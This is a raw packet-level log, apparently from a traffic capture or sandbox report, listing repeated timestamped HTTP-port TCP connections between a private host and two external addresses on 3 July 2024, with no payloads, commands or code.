                                                                Jul 3, 2024 08:39:16.463234901 CEST4976680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:16.469005108 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.186646938 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.186793089 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.192120075 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.197006941 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.421735048 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.421853065 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.531310081 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.531663895 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.538590908 CEST804976777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.538606882 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:17.538717031 CEST4976780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.538764000 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.538980007 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:17.545633078 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.214051962 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.214206934 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.220535994 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.225430965 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.434246063 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.434413910 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.548199892 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.548567057 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.554241896 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.554333925 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.554506063 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.554625034 CEST804976877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:18.554670095 CEST4976880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:18.560036898 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.239140034 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.239310026 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.250669956 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.255584955 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.682662964 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.682806969 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.682985067 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.683046103 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.796646118 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.797008038 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.801888943 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.801914930 CEST804976977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:19.802001953 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.802038908 CEST4976980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.802261114 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:19.807029963 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.502005100 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.502259016 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.503043890 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.507920980 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.725506067 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.725650072 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.827999115 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.828403950 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.833285093 CEST804977077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.833300114 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:20.833394051 CEST4977080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.833431005 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.833626032 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:20.838879108 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.515183926 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.515312910 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.516042948 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.520939112 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.733532906 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.733616114 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.844013929 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.844522953 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.849288940 CEST804977177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.849394083 CEST4977180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.849493980 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:21.849567890 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.849771023 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:21.854829073 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.534938097 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.534998894 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.537600040 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.542638063 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.753186941 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.753313065 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.859236002 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.859616041 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.864469051 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.864603043 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.864654064 CEST804977377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:22.864710093 CEST4977380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.864870071 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:22.869702101 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.566082954 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.566229105 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.567114115 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.571985006 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.788150072 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.788223028 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.890480042 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.890825033 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.895742893 CEST804977477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.895761967 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:23.895848036 CEST4977480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.895908117 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.896105051 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:23.900882959 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.579269886 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.579396963 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.580159903 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.585088015 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.799880981 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.800030947 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.896841049 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:39:24.896903038 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:39:24.906147957 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.906527042 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.911473989 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.911595106 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.911614895 CEST804977577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:24.911669970 CEST4977580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.911875010 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:24.917385101 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.599057913 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.599174976 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.600011110 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.604926109 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.819504976 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.819633961 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.921657085 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.922054052 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.927122116 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.927253962 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.927445889 CEST804977677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:25.927493095 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.927524090 CEST4977680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:25.932802916 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.622308969 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.622481108 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.623471022 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.628511906 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.840954065 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.841173887 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.953130007 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.953521967 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.958374023 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.958537102 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.958700895 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.959287882 CEST804977777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:26.959347010 CEST4977780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:26.963645935 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.644347906 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.644462109 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.647353888 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.652160883 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.862199068 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.862292051 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.968601942 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.968967915 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.973844051 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.973929882 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.973958015 CEST804977877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:27.974009037 CEST4977880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.974234104 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:27.978980064 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:28.669585943 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:28.669728994 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:28.670582056 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:28.675400019 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:28.892270088 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:28.892370939 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:28.999980927 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.000369072 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.005611897 CEST804977977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.005626917 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.005702019 CEST4977980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.005753040 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.005929947 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.010689974 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.693011999 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.693092108 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.694189072 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:29.698965073 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.912904024 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:29.913045883 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.015521049 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.015957117 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.020776987 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.020879030 CEST804978177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.020917892 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.020956993 CEST4978180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.021086931 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.026288986 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.707417965 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.707552910 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.708545923 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:30.713315010 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.926227093 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:30.926285028 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.031558990 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.031979084 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.036765099 CEST804978277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.036791086 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.036849976 CEST4978280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.036925077 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.037213087 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.041987896 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.722405910 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.722486019 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.727772951 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:31.732841969 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.945750952 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:31.945884943 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.062602043 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.063009977 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.067836046 CEST804978477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.067850113 CEST804978377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.067981005 CEST4978380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.067981005 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.068205118 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.073007107 CEST804978477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.755413055 CEST804978477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.755469084 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.759172916 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.759521961 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.764298916 CEST804978477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.764364958 CEST804978577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:32.764388084 CEST4978480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.764431000 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.764575958 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:32.769304037 CEST804978577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:33.462378979 CEST804978577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:33.462440014 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.580722094 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.581101894 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.585949898 CEST804978677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:33.586015940 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.586047888 CEST804978577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:33.586087942 CEST4978580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.586379051 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:33.591224909 CEST804978677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:33.593174934 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:39:33.597995043 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:39:34.272352934 CEST804978677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:34.272428036 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.275326967 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.275703907 CEST4978780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.280535936 CEST804978677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:34.280565977 CEST804978777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:34.280602932 CEST4978680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.280770063 CEST4978780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.280906916 CEST4978780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.286063910 CEST804978777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:34.286158085 CEST4978780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.393480062 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.398447990 CEST804978877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:34.400979042 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.401118040 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:34.405922890 CEST804978877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.099566936 CEST804978877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.099652052 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.102727890 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.103164911 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.107986927 CEST804978977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.108069897 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.108336926 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.113154888 CEST804978977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.140682936 CEST804978877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.140758038 CEST4978880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.842964888 CEST804978977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.843027115 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.957353115 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.957809925 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.962640047 CEST804979077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.962656975 CEST804978977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:35.962730885 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.962811947 CEST4978980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.963088036 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:35.972189903 CEST804979077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:36.663314104 CEST804979077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:36.663495064 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.666668892 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.666724920 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.671703100 CEST804979177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:36.671910048 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.672002077 CEST804979077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:36.672023058 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.672283888 CEST4979080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:36.676974058 CEST804979177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:37.360141993 CEST804979177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:37.360203028 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.471565962 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.471962929 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.476840019 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:37.476965904 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.477125883 CEST804979177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:37.477185965 CEST4979180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.481754065 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:37.486609936 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.180538893 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.180600882 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.187891960 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.192764997 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.407186985 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.407269955 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.519912004 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.521115065 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.525166988 CEST804979277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.525228024 CEST4979280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.525966883 CEST804979377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:38.526041985 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.531913996 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:38.536778927 CEST804979377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.200954914 CEST804979377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.201031923 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.204708099 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.205043077 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.209724903 CEST804979377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.209795952 CEST804979477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.209839106 CEST4979380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.209918976 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.210441113 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:39.215266943 CEST804979477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.890798092 CEST804979477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:39.890896082 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.020979881 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.021286011 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.026124001 CEST804979577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.026324034 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.026331902 CEST804979477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.026397943 CEST4979480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.031780005 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.036628962 CEST804979577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.711556911 CEST804979577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.711630106 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.714502096 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.714848042 CEST4979680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.719801903 CEST804979677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.719888926 CEST4979680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.719969034 CEST804979577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:40.720119953 CEST4979580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.720310926 CEST4979680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:40.725101948 CEST804979677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:41.396595001 CEST804979677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:41.396666050 CEST4979680192.168.2.677.91.77.82
